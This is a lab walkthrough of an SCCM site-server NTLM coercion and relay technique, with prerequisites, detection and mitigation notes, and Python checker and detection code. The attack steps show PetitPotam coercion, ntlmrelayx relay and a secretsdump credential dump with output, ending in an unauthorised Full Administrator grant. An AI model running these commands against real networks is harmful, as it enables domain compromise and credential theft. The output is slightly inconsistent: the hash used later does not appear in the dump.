Hierarchy Takeover via NTLM coercion and relay to SMB between primary and passive site servers
- Valid Active Directory domain credentials
- Connectivity to SMB (TCP/445) on a coercion target:
    - TAKEOVER-7.1: Coerce primary site server
    - TAKEOVER-7.2: Coerce passive site server
- Connectivity from the coercion target to SMB (TCP/445) on the relay server
- Coercion target settings:
    - `BlockNTLM` = `0` or not present, or = `1` and `BlockNTLMServerExceptionList` contains attacker relay server [DEFAULT]
    - `RestrictSendingNTLMTraffic` = `0`, `1`, or not present, or = `2` and `ClientAllowedNTLMServers` contains attacker relay server [DEFAULT]
    - Domain controller settings:
        - `RestrictNTLMInDomain` = `0` or not present, or is configured with any value and `DCAllowedNTLMServers` contains coercion target [DEFAULT]
- Connectivity from the relay server to SMB on target host
    - SMS Provider role installed on target preferred (default) but not required
- Relay target settings:
    - `RequireSecuritySignature` = `0` or not present [DEFAULT]
    - `RestrictReceivingNTLMTraffic` = `0` or not present [DEFAULT]
    - Coercion target is local admin (to access RPC/admin shares) [DEFAULT]
    - Domain controller settings:
        - `RestrictNTLMInDomain` = `0` or not present, or is configured with any value and `DCAllowedNTLMServers` contains relay target [DEFAULT]
        - `LmCompatibilityLevel` < `5` or not present, or = `5` and `LmCompatibilityLevel` >= `3` on the coercion target [DEFAULT]
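The requirement list above is a set of combined conditions on three hosts, and it is easy to misjudge which setting on which host actually blocks the relay. The following is an added example (not code from Misconfiguration Manager, sccmhunter or Impacket) that encodes those conditions as a single check: each dict models the registry/policy values the list names, with a missing key meaning "not present". The host names, accounts, attacker address and the two sample configurations are constructed for illustration; treating an absent `LmCompatibilityLevel` on the coercion target as 3 is an assumption about the modern Windows default.

```python
"""Check the TAKEOVER-7 prerequisites listed above against host settings.

Added example for this page; it is not code from Misconfiguration Manager,
sccmhunter or Impacket. Each dict models the registry/policy values the
requirement list names, with a missing key meaning "not present". The host
names, accounts and sample settings below are constructed for illustration.
"""


def _in_list(settings, key, name):
    """True if the multi-string allow-list `key` names `name` (case-insensitive)."""
    return name.lower() in (entry.lower() for entry in settings.get(key, ()))


def check_takeover7(coercion, relay, dc, *, coercion_host, coercion_account,
                    relay_host, attacker_host):
    """Return the unmet prerequisites; an empty list means the relay should work.

    coercion         settings on the host whose NTLM authentication is coerced
    relay            settings on the host the authentication is relayed to
    dc               settings on the domain controller validating the logon
    coercion_account the coercion target's computer account, e.g. LAB\\PASSIVE$
    attacker_host    the attacker's relay listener as the coercion target sees it
    """
    unmet = []

    # Coercion target: may it send NTLM to the attacker's listener at all?
    if coercion.get("BlockNTLM", 0) == 1 and not _in_list(
            coercion, "BlockNTLMServerExceptionList", attacker_host):
        unmet.append("coercion target: BlockNTLM=1 and relay server not in BlockNTLMServerExceptionList")
    if coercion.get("RestrictSendingNTLMTraffic", 0) == 2 and not _in_list(
            coercion, "ClientAllowedNTLMServers", attacker_host):
        unmet.append("coercion target: RestrictSendingNTLMTraffic=2 and relay server not in ClientAllowedNTLMServers")

    # Domain controller: NTLM pass-through must be allowed for both site servers.
    if dc.get("RestrictNTLMInDomain", 0) != 0:
        for role, host in (("coercion target", coercion_host), ("relay target", relay_host)):
            if not _in_list(dc, "DCAllowedNTLMServers", host):
                unmet.append(f"DC: RestrictNTLMInDomain set and {role} not in DCAllowedNTLMServers")
    # LmCompatibilityLevel 5 on the DC rejects NTLMv1, so the coercion target must
    # send NTLMv2 (level >= 3). An absent value is treated as 3 (assumed default).
    if dc.get("LmCompatibilityLevel", 0) >= 5 and coercion.get("LmCompatibilityLevel", 3) < 3:
        unmet.append("DC: LmCompatibilityLevel=5 but coercion target sends NTLMv1")

    # Relay target: must accept an unsigned, relayed NTLM session with admin rights.
    if relay.get("RequireSecuritySignature", 0) != 0:
        unmet.append("relay target: RequireSecuritySignature=1 (SMB signing required, PREVENT-12)")
    if relay.get("RestrictReceivingNTLMTraffic", 0) != 0:
        unmet.append("relay target: RestrictReceivingNTLMTraffic set")
    if not _in_list(relay, "LocalAdministrators", coercion_account):
        unmet.append("relay target: coercion target is not a local administrator")
    return unmet


# Constructed: out-of-the-box settings for the walkthrough's layout, where the
# passive site server is coerced and the primary is the relay target.
LAYOUT = dict(coercion_host="passive.internal.lab", coercion_account="LAB\\PASSIVE$",
              relay_host="sccm.internal.lab", attacker_host="10.10.100.200")
DEFAULT_COERCION = {}
DEFAULT_RELAY = {"LocalAdministrators": ["LAB\\PASSIVE$", "LAB\\Domain Admins"]}
DEFAULT_DC = {}

# Constructed: the same hosts after PREVENT-12 plus outbound/inbound NTLM restrictions.
HARDENED_COERCION = {"RestrictSendingNTLMTraffic": 2,
                     "ClientAllowedNTLMServers": ["sccm.internal.lab"]}
HARDENED_RELAY = {"RequireSecuritySignature": 1, "RestrictReceivingNTLMTraffic": 2,
                  "LocalAdministrators": ["LAB\\PASSIVE$"]}


def demo():
    """Return (unmet for default hosts, unmet for hardened hosts)."""
    return (check_takeover7(DEFAULT_COERCION, DEFAULT_RELAY, DEFAULT_DC, **LAYOUT),
            check_takeover7(HARDENED_COERCION, HARDENED_RELAY, DEFAULT_DC, **LAYOUT))


if __name__ == "__main__":
    for label, unmet in zip(("defaults", "hardened"), demo()):
        print(f"{label}: {'relay possible' if not unmet else 'blocked'}")
        for reason in unmet:
            print("  -", reason)
```

With the defaults the check returns no unmet items, which is the point of the [DEFAULT] tags in the list above; the hardened variant is blocked three ways, and the first reason reported is the one that matters most in practice, since SMB signing on the relay target stops the relayed session regardless of what the coercion target is allowed to send.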
For high availability configurations, the passive site server role is deployed to SCCM sites where redundancy for the site server role is required. A passive site server shares the same configuration and privileges as the active site server yet performs no writes or changes to the site until promoted manually or during an automated failover.
During setup, the passive site server's computer account is required to be a member of the active site server's local Administrators group. An attacker who can coerce NTLM authentication from an active or passive site server via SMB and relay it to SMB on the other (active or passive) site server compromises that host and can then either:
- Authenticate to its own hosted SMS Provider as the site server
- Authenticate to LDAP(s) as the site server and configure resource-based constrained delegation (RBCD) to impersonate an SCCM Full Administrator
The "Full Administrator" security role is granted all permissions in Configuration Manager for all scopes and all collections. An attacker with this privilege can execute arbitrary programs on any client device that is online as SYSTEM, the currently logged on user, or as a specific user when they next log on. They can also leverage tools such as CMPivot and Run Script to query or execute scripts on client devices in real-time using the AdminService or WMI on an SMS Provider.
- DETECT-1: Monitor site server domain computer accounts authenticating from another source
- DETECT-5: Monitor group membership changes for SMS Admins
- DETECT-5: Monitor group membership changes for RBAC_Admins table
- PREVENT-12: Require SMB signing on site systems
- PREVENT-20: Block unnecessary connections to site systems
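DETECT-1 is the detection most directly tied to this technique: after the relay, the relay target's Security log shows a successful network logon for the other site server's computer account whose source address is the attacker's listener rather than the site server itself. The following is an added example (not from the Misconfiguration Manager page or any tool it references) that runs that rule over a constructed CSV export of 4624/4625 events; the inventory of expected source addresses, the export layout and the events themselves are all constructed for illustration, with 10.10.100.200 standing in for the attacker's relay server.

```python
"""DETECT-1 as a rule: a site server computer account logging on from another source.

Added example, not from the Misconfiguration Manager page or any tool it uses.
In the relay above, the primary site server's Security log records a network
logon (event 4624, logon type 3, NTLM) for LAB\\PASSIVE$ whose source address
is the attacker's relay listener rather than the passive site server. The CSV
export format, the inventory of expected sources and the sample events are all
constructed for this example.
"""
import csv
import io

# Constructed inventory: site server computer accounts and the addresses each
# legitimately authenticates from. Any other source is "another source".
SITE_SERVER_SOURCES = {
    "LAB\\SCCM$": {"10.10.100.121"},
    "LAB\\PASSIVE$": {"10.10.100.141"},
}

# Local logons (services, scheduled tasks) report no remote address.
LOCAL_SOURCES = {"-", "::1", "127.0.0.1"}

# Constructed export of events 4624/4625 from sccm.internal.lab (10.10.100.121).
# Only the fourth data line is the relayed session from the attacker at 10.10.100.200.
SAMPLE_EVENTS = """\
EventID,Computer,TargetDomainName,TargetUserName,LogonType,AuthenticationPackageName,IpAddress
4624,sccm.internal.lab,LAB,PASSIVE$,3,NTLM,10.10.100.141
4624,sccm.internal.lab,LAB,lowpriv,3,Kerberos,10.10.100.50
4624,sccm.internal.lab,LAB,SCCM$,5,Negotiate,-
4624,sccm.internal.lab,LAB,PASSIVE$,3,NTLM,10.10.100.200
4625,sccm.internal.lab,LAB,PASSIVE$,3,NTLM,10.10.100.200
4624,sccm.internal.lab,LAB,PASSIVE$,3,Kerberos,::1
"""


def find_rogue_site_server_logons(csv_text):
    """Return one alert per successful logon of a site server account from an unexpected address."""
    alerts = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["EventID"] != "4624":
            continue  # failed logons are a different (noisier) signal
        account = f'{row["TargetDomainName"]}\\{row["TargetUserName"]}'.upper()
        expected = SITE_SERVER_SOURCES.get(account)
        if expected is None:
            continue  # not a site server computer account
        source = row["IpAddress"]
        if source in LOCAL_SOURCES or source in expected:
            continue
        alerts.append({
            "account": account,
            "computer": row["Computer"],
            "source": source,
            "logon_type": row["LogonType"],
            "package": row["AuthenticationPackageName"],
            # A relayed session is always NTLM; Kerberos from a new address is
            # still worth a look (new host, re-IP) but is not this technique.
            "severity": "high" if row["AuthenticationPackageName"] == "NTLM" else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in find_rogue_site_server_logons(SAMPLE_EVENTS):
        print(f'[{alert["severity"]}] {alert["account"]} authenticated to '
              f'{alert["computer"]} from {alert["source"]} via {alert["package"]}')
```

The inventory of expected sources is the part that needs care in a real deployment: site servers legitimately authenticate to each other and to the SMS Provider and database hosts, so the allow-list should be built from the site's own configuration rather than guessed, and any NTLM (not Kerberos) logon of a site server account from outside it is the signal to treat as a relay.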
- TAKEOVER-7.1: Coerce primary site server
- TAKEOVER-7.2: Coerce passive site server
The steps to execute TAKEOVER-7.1 and TAKEOVER-7.2 are the same, with the coercion target and relay target swapped. In the walkthrough below, NTLM authentication is coerced from the passive site server and relayed to SMB on the primary (active) site server.
- Use SCCMHunter to profile SCCM infrastructure:

```
[04:24:43 PM] INFO [+] Finished profiling Site Servers.
[04:24:43 PM] INFO +----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+
| Hostname             | SiteCode          | SigningStatus   | SiteServer   | SMSProvider   | Active   | Passive   | MSSQL   |
+======================+===================+=================+==============+===============+==========+===========+=========+
| sccm.internal.lab    | LAB               | False           | True         | True          | True     | False     | False   |
+----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+
| passive.internal.lab | LAB               | False           | True         | True          | False    | True      | False   |
+----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+
```

The results of the `find` module indicate:
    - The SCCM.INTERNAL.LAB and PASSIVE.INTERNAL.LAB systems are both site servers in the "LAB" site
    - The SCCM.INTERNAL.LAB host is the active site server and the PASSIVE.INTERNAL.LAB host is the passive site server
    - SMB signing is disabled on both systems
- On the attacker relay server, start `ntlmrelayx`, targeting the SMB service on the primary site server identified in the previous step. The `-socks` flag is used to hold the authenticated session open:

```
└─# python3 ntlmrelayx.py -t smb://TARGET_SITE_SERVER -smb2support -socks
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra

[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening at port 1080
[*] IMAPS Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] IMAP Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
 * Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
 * Debug mode: off
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
```
- From the attacker host, coerce NTLM authentication from the passive site server via SMB, targeting the relay server's IP address:

```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam]
└─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd <NTLMRELAYX_LISTENER_IP> <PASSIVE_SITE_SERVER_IP>

Trying pipe lsarpc
[-] Connecting to ncacn_np:passive.internal.lab[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```

After a few seconds, you should receive an SMB connection on the relay server that is forwarded to the SMB service on the site server, and the authenticated session is held open:

```
Type help for list of commands
ntlmrelayx> [*] SMBD-Thread-9 (process_request_thread): Received connection from 10.10.100.141, attacking target smb://10.10.100.121
[*] Authenticating against smb://10.10.100.121 as LAB/PASSIVE$ SUCCEED
[*] SOCKS: Adding LAB/PASSIVE$@10.10.100.121(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.100.141 controlled, but there are no more targets left!
[*] SOCKS: Proxying client session for LAB/PASSIVE$@10.10.100.121(445)
```
- Proxy `secretsdump.py` through the held SOCKS session to authenticate to the primary site server in the context of the passive site server's computer account and recover the primary site server's hashed credentials. The session is already authenticated, so press Enter at the password prompt rather than supplying a password:

```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam]
└─# proxychains secretsdump.py lab/passive\$@sccm.internal.lab
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.100.121:445  ...  OK
[*] Target system bootKey: 0x436a3e67c2c89ded60aeb1f1819428c8
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:003d349493bc6acfb242ae5c2ff3d819:::
[*] Dumping cached domain logon information (domain/username:hash)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
lab\SCCM$:aes256-cts-hmac-sha1-96:76bf72e59677dfe072fd6609ccdc1343d318f7cc557b25588b36046747f80172
lab\SCCM$:aes128-cts-hmac-sha1-96:b2d7f1a79de08211ae6a518c82a715f4
lab\SCCM$:des-cbc-md5:5de98a07aefb983e
```
- Use the `sccmhunter` `admin` module to authenticate to the Administration Service API as the primary site server's computer account, using the recovered hash, and add an arbitrary user as a Full Administrator:

```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/sccmhunter]
└─# python3 sccmhunter.py admin -u sccm\$ -p aad3b435b51404eeaad3b435b51404ee:6963d86f6d65497d7b2126d44e6cdb4e -ip 10.10.100.121
[06:53:08 PM] INFO [!] Enter help for extra shell commands
() C:\ >> show_admins
[06:53:11 PM] INFO Tasked SCCM to list current SMS Admins.
[06:53:11 PM] INFO Current Full Admin Users:
[06:53:11 PM] INFO lab\Administrator
() (C:\) >> get_user specter
[06:53:13 PM] INFO [*] Collecting users...
[06:53:13 PM] INFO [+] User found.
[06:53:14 PM] INFO ------------------------------------------
DistinguishedName: CN=specter,OU=DOMUSERS,DC=internal,DC=lab
FullDomainName: INTERNAL.LAB
FullUserName: specter
Mail:
NetworkOperatingSystem: Windows NT
ResourceId: 2063597574
sid: S-1-5-21-2391214593-4168590120-2599633397-1109
UniqueUserName: lab\specter
UserAccountControl: 66048
UserName: specter
UserPrincipalName: specter@internal.lab
------------------------------------------
() (C:\) >> add_admin specter S-1-5-21-2391214593-4168590120-2599633397-1109
[06:53:19 PM] INFO Tasked SCCM to add specter as an administrative user.
[06:53:19 PM] INFO [+] Successfully added specter as an admin.
() (C:\) >> show_admins
[06:53:20 PM] INFO Tasked SCCM to list current SMS Admins.
[06:53:20 PM] INFO Current Full Admin Users:
[06:53:20 PM] INFO lab\Administrator
[08:46:39 PM] INFO specter
```
- Chris Thompson, SCCM Site Takeover via Automatic Client Push Installation
- Garrett Foster, SCCM Hierarchy Takeover with High Availability
- Microsoft, Site server high availability in Configuration Manager